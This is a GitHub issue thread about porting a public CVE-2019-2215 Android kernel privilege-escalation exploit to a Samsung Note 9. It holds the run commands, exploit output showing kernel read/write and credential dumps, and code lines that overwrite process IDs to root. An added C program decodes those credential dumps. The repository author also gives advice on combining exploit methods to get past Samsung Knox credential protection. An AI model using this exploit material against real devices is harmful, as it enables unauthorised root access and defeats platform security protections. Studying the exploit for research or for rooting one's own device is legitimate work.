chompie1337 / s8_2019_2215_poc

PoC 2019-2215 exploit for S8/S8 active with DAC + SELinux + Knox/RKP bypass
220 stars, 50 forks

Samsung Note 9 (SM-N9600) poc #2

Closed. magicxor closed this 3 years ago

magicxor commented 3 years ago

Hi @chompie1337, thank you for such great work. It's pretty useful to obtain root privileges without ticking KNOX.

I want to adapt your poc for Samsung Note 9 (SM-N9600) (Android version 8.1.0, Kernel version 4.9.65-14505206 (gcc version 4.9.x 20150123 (prerelease) (GCC)) Tue Jan 8 16:29:04 KST 2019, Android security patch level January 1, 2019, Baseband version N9600ZCU1ARL3, Build Number: N9600ZHU1ASA5) to modify my build.prop.

I'm not very familiar with the Android kernel, so I'm wondering how you found DECISION_AVC_CACHE_OFFSET. It seems that I have found every offset except for this one.

(There is no N9600ZHU1ASA5 version on opensource.samsung.com so I took N9600ZHU1ARL1 from https://github.com/klabit87/twrp_android_kernel_samsung_crownqltechn)

At this point, my phone reboots while s8_poc is running:

crownqltechn:/sdcard/USER/cve $ cp s8_poc /data/local/tmp/s8_poc
crownqltechn:/sdcard/USER/cve $ cd /data/local/tmp
crownqltechn:/data/local/tmp $ chmod +x s8_poc
crownqltechn:/data/local/tmp $ ./s8_poc -s
[+] options are set, we're ready to go :)
[!] attempting to exploit bad binder...
leak_kernel_memory, i = 0
...
usleep(CHILD_SLEEP);
epoll_ctl(iEpFd, EPOLL_CTL_DEL, iBinderFd, &epoll_ev); WITH ARGUMENTS iEpFd=4, EPOLL_CTL_DEL=2, iBinderFd=3, &epoll_ev

I would be glad if you find some time to help.

magicxor commented 3 years ago

The following is the result I got with https://github.com/magicxor/qu1ckr00t/blob/0ed56c759a6e5877c5ec82c096553e8e4e778104/native/poc.c

CHILD: Doing EPOLL_CTL_DEL.
CHILD: Finished EPOLL_CTL_DEL.
CHILD: Finished write to FIFO.
writev() returns 0x2000
PARENT: Finished calling READV
current_ptr == 0xffffffc10b75ad00
CHILD: Doing EPOLL_CTL_DEL.
CHILD: Finished EPOLL_CTL_DEL.
recvmsg() returns 49, expected 49
should have stable kernel R/W now :)
current->mm == 0xffffffc160bf5e40
current->mm->user_ns == 0xffffff800a65eeb8
kernel base is 0xffffff80083bc000
&init_task == 0xffffff800a653380
init_task.cred == 0xffffff80094ec010
init->cred
00000000  04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000010  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000030  ff ff ff ff 3f 00 00 00 ff ff ff ff 3f 00 00 00  |....?.......?...|
00000040  ff ff ff ff 3f 00 00 00 00 00 00 00 00 00 00 00  |....?...........|
00000050  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000060  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000070  00 00 00 00 00 00 00 00 e0 c0 4e 09 80 ff ff ff  |..........N.....|
00000080  48 ee 65 0a 80 ff ff ff b8 ee 65 0a 80 ff ff ff  |H.e.......e.....|
00000090  b8 06 66 0a 80 ff ff ff 00 00 00 00 00 00 00 00  |..f.............|
000000a0  00 00 00 00 00 00 00 00 b0 06 66 0a 80 ff ff ff  |..........f.....|
000000b0  80 33 65 0a 80 ff ff ff 00 00 00 00 00 00 00 00  |.3e.............|
000000c0  00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00  |................|
current->cred == 0xffffffc01ffdb500
Starting as uid 2000
current->cred
00000000  01 00 00 00 d0 07 00 00 d0 07 00 00 d0 07 00 00  |................|
00000010  d0 07 00 00 d0 07 00 00 d0 07 00 00 d0 07 00 00  |................|
00000020  d0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000030  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000040  c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000050  00 00 00 00 00 00 00 00 00 77 5b 68 c1 ff ff ff  |.........w[h....|
00000060  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000070  00 00 00 00 00 00 00 00 c0 56 a4 1f c0 ff ff ff  |.........V......|
00000080  00 6e fc d4 c0 ff ff ff b8 ee 65 0a 80 ff ff ff  |.n........e.....|
00000090  00 17 5a 68 c1 ff ff ff 00 00 00 00 00 00 00 00  |..Zh............|
000000a0  00 00 00 00 00 00 00 00 70 93 6b 68 c1 ff ff ff  |........p.kh....|
000000b0  00 ad 75 0b c1 ff ff ff 00 a0 06 20 c0 ff ff ff  |..u........ ....|
000000c0  06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000000  00 02 00 00 00 00 00 00 fe ff ff ff ff ff ff ff  |................|
00000010  00 00 00 00 00 00 00 00 17 12 f0 b3 b4 af da c8  |................|
init->security_cred
00000000  01 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00  |................|
00000010  00 00 00 00 00 00 00 00 10 c0 4e 09 80 ff ff ff  |..........N.....|
current->security_cred
00000000  92 04 00 00 92 04 00 00 00 00 00 00 00 00 00 00  |................|
00000010  00 00 00 00 00 00 00 00 00 b5 fd 1f c0 ff ff ff  |................|
Escalating...

Then my phone rebooted. Kernel R/W works:

crownqltechn:/ $ uname -a
Linux localhost 4.9.65-14505206 EXPLOITED KERNEL aarch64

But the phone reboots every time I try to overwrite my IDs:

  // change IDs to root (there are eight: uid, gid, suid, sgid, euid, egid, fsuid, fsgid)
  for (int i = 0; i < 8; i++)
    kernel_write_uint(my_cred+4 + i*4, 0);

or

  kernel_write_ulong(pSecurityCapableListHead, pSecurityCapableListHead);

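As an added worked example (not code from this repository, from qu1ckr00t, or from either commenter), the following C program decodes the init->cred and current->cred hexdumps printed above into struct cred fields, so that the eight IDs the qu1ckr00t loop zeroes (uid, gid, suid, sgid, euid, egid, fsuid, fsgid at my_cred+4 through my_cred+0x20) and the capability sets can be read off directly. The offsets up to cap_ambient are the upstream 4.9 layout; the pointer offsets (security at 0x78, then user, user_ns, group_info) are an assumption for an arm64 4.9 build with CONFIG_KEYS, which the program checks against the current->mm->user_ns value the PoC printed separately. The parser, field names and helper functions are mine, not the PoC's.

```c
/* Added example, not code from this repository or from qu1ckr00t: decode the
 * struct cred hexdumps the PoC printed above. Layout assumptions are marked. */
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* First 0xa0 bytes of the init->cred and current->cred dumps, copied from the PoC output above. */
static const char INIT_CRED_DUMP[] =
"00000000  04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|\n"
"00000010  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|\n"
"00000020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|\n"
"00000030  ff ff ff ff 3f 00 00 00 ff ff ff ff 3f 00 00 00  |....?.......?...|\n"
"00000040  ff ff ff ff 3f 00 00 00 00 00 00 00 00 00 00 00  |....?...........|\n"
"00000050  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|\n"
"00000060  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|\n"
"00000070  00 00 00 00 00 00 00 00 e0 c0 4e 09 80 ff ff ff  |..........N.....|\n"
"00000080  48 ee 65 0a 80 ff ff ff b8 ee 65 0a 80 ff ff ff  |H.e.......e.....|\n"
"00000090  b8 06 66 0a 80 ff ff ff 00 00 00 00 00 00 00 00  |..f.............|\n";

static const char CURRENT_CRED_DUMP[] =
"00000000  01 00 00 00 d0 07 00 00 d0 07 00 00 d0 07 00 00  |................|\n"
"00000010  d0 07 00 00 d0 07 00 00 d0 07 00 00 d0 07 00 00  |................|\n"
"00000020  d0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|\n"
"00000030  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|\n"
"00000040  c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|\n"
"00000050  00 00 00 00 00 00 00 00 00 77 5b 68 c1 ff ff ff  |.........w[h....|\n"
"00000060  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|\n"
"00000070  00 00 00 00 00 00 00 00 c0 56 a4 1f c0 ff ff ff  |.........V......|\n"
"00000080  00 6e fc d4 c0 ff ff ff b8 ee 65 0a 80 ff ff ff  |.n........e.....|\n"
"00000090  00 17 5a 68 c1 ff ff ff 00 00 00 00 00 00 00 00  |..Zh............|\n";

static const char HEX[] = "0123456789abcdef";
static int hexval(int c) { const char *p = c ? strchr(HEX, tolower(c)) : NULL; return p ? (int)(p - HEX) : -1; }

/* Parse "hexdump -C" style text into bytes: skip the offset column, read two-digit tokens,
 * stop at the '|' that opens the ASCII column (which may itself contain hex letters).
 * Returns the byte count, or -1 on malformed input or overflow. */
static long parse_hexdump(const char *text, uint8_t *out, size_t cap) {
    size_t n = 0;
    for (const char *line = text; *line; line++) {
        const char *end = line + strcspn(line, "\n"), *q = line;
        while (q < end && !isspace((unsigned char)*q)) q++;          /* offset column */
        for (;;) {
            while (q < end && isspace((unsigned char)*q)) q++;
            if (q >= end || *q == '|') break;
            int hi = hexval((unsigned char)q[0]), lo = q + 1 < end ? hexval((unsigned char)q[1]) : -1;
            if (hi < 0 || lo < 0 || (q + 2 < end && !isspace((unsigned char)q[2])) || n >= cap) return -1;
            out[n++] = (uint8_t)(hi << 4 | lo);
            q += 2;
        }
        line = end;
        if (!*line) break;
    }
    return (long)n;
}

/* struct cred offsets. 0x00..0x4f is the upstream 4.9 layout: usage, the eight ids,
 * securebits, five kernel_cap_t. The pointer offsets ASSUME CONFIG_KEYS on this arm64
 * build; main() checks that against the user_ns value the PoC printed (0xffffff800a65eeb8). */
enum { CRED_USAGE = 0x00, CRED_IDS = 0x04, CRED_SECUREBITS = 0x24, CRED_CAPS = 0x28,
       CRED_SECURITY = 0x78, CRED_USER = 0x80, CRED_USER_NS = 0x88, CRED_GROUP_INFO = 0x90,
       CRED_MIN_LEN = 0x98 };

struct cred_view {
    uint32_t usage, ids[8], securebits;   /* ids: uid gid suid sgid euid egid fsuid fsgid */
    uint64_t caps[5];                     /* inheritable, permitted, effective, bset, ambient */
    uint64_t security, user, user_ns, group_info;
};

static uint32_t le32(const uint8_t *b) { return (uint32_t)b[0] | (uint32_t)b[1] << 8 | (uint32_t)b[2] << 16 | (uint32_t)b[3] << 24; }
static uint64_t le64(const uint8_t *b) { return le32(b) | (uint64_t)le32(b + 4) << 32; }

/* Decode a dump into a cred_view; fails if the dump is malformed or too short for the pointer fields. */
static int decode_cred_dump(const char *dump, struct cred_view *v) {
    uint8_t b[256];
    long n = parse_hexdump(dump, b, sizeof b);
    if (n < CRED_MIN_LEN) return -1;
    v->usage = le32(b + CRED_USAGE);
    for (int i = 0; i < 8; i++) v->ids[i] = le32(b + CRED_IDS + 4 * i);
    v->securebits = le32(b + CRED_SECUREBITS);
    for (int i = 0; i < 5; i++) v->caps[i] = le64(b + CRED_CAPS + 8 * i);
    v->security = le64(b + CRED_SECURITY);  v->user = le64(b + CRED_USER);
    v->user_ns = le64(b + CRED_USER_NS);    v->group_info = le64(b + CRED_GROUP_INFO);
    return 0;
}

/* All eight ids zero: the state the qu1ckr00t loop over my_cred+4+i*4 tries to reach. */
static int cred_is_root(const struct cred_view *v) {
    for (int i = 0; i < 8; i++) if (v->ids[i] != 0) return 0;
    return 1;
}

int main(void) {
    struct cred_view init_cred, cur_cred;
    if (decode_cred_dump(INIT_CRED_DUMP, &init_cred) || decode_cred_dump(CURRENT_CRED_DUMP, &cur_cred)) { fprintf(stderr, "malformed dump\n"); return 1; }
    printf("init->cred:    uid=%u cap_bset=%#llx root=%d\n", init_cred.ids[0], (unsigned long long)init_cred.caps[3], cred_is_root(&init_cred));
    printf("current->cred: uid=%u cap_bset=%#llx root=%d\n", cur_cred.ids[0], (unsigned long long)cur_cred.caps[3], cred_is_root(&cur_cred));
    /* Layout check: user_ns at 0x88 must match what the PoC printed for current->mm->user_ns. */
    return cur_cred.user_ns == 0xffffff800a65eeb8ULL && init_cred.user_ns == cur_cred.user_ns ? 0 : 1;
}
```

Decoding the two dumps shows what the loop was aiming at: init's cred has all eight IDs at 0 and cap_permitted, cap_effective and cap_bset all equal to 0x3fffffffff (the full 38-capability set of a 4.9 kernel), while the shell's cred carries 2000 in every ID slot, empty permitted and effective sets, and cap_bset = 0xc0 (CAP_SETGID | CAP_SETUID). Both records hold the same user_ns pointer at offset 0x88, which is the only evidence here that the assumed pointer offsets are right for this build; on a kernel with a different config the pointer part of the enum would need re-deriving from that kernel's struct cred.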
chompie1337 commented 3 years ago

Hi, the reason your phone reboots with the qu1ckr00t PoC is that the cred structures are protected with Samsung Knox, so they can't just be simply overwritten. Hence the need for the special bypasses in this PoC. The bad binder exploitation method changes slightly depending on the mod of the offset of the wait_head structure (ending in 0x0 or 0x8). At some point, I will release this PoC that is compatible with the S8 Exynos. The Oreo firmwares for the S8 Exynos have the offset that requires the other type of bad binder exploitation. If you want, you can simply replace the method for obtaining R/W from qu1ckr00t into this PoC.